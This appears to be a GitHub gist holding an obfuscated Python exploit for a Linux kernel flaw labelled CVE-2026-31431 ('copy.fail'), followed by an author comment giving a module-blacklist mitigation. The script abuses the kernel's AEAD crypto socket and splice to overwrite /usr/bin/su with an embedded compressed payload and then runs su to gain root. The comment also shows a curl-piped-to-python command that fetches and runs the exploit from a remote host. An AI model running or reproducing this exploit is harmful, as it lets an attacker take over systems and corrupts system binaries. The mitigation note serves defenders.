Skip to content

Instantly share code, notes, and snippets.

@ridwan-muhamad

ridwan-muhamad/copy_fail_exploit.py

Last active April 30, 2026 05:35
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save ridwan-muhamad/74df4a2d89a4e6c51cc180101950c79c to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save ridwan-muhamad/74df4a2d89a4e6c51cc180101950c79c to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2026-31431 | copy.fail | xint.io/blog/copy-fail-linux-distributions
Raw
copy_fail_exploit.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
@ridwan-muhamad
Copy link
Copy Markdown
Author

ridwan-muhamad commented Apr 30, 2026
edited
Loading

Quick Mitigation (No Reboot) !!

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true

and it seemed to have mitigated the issue:

~$ curl https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0  11243      0 --:--:-- --:--:-- --:--:-- 11421
Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
mitigation cve

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment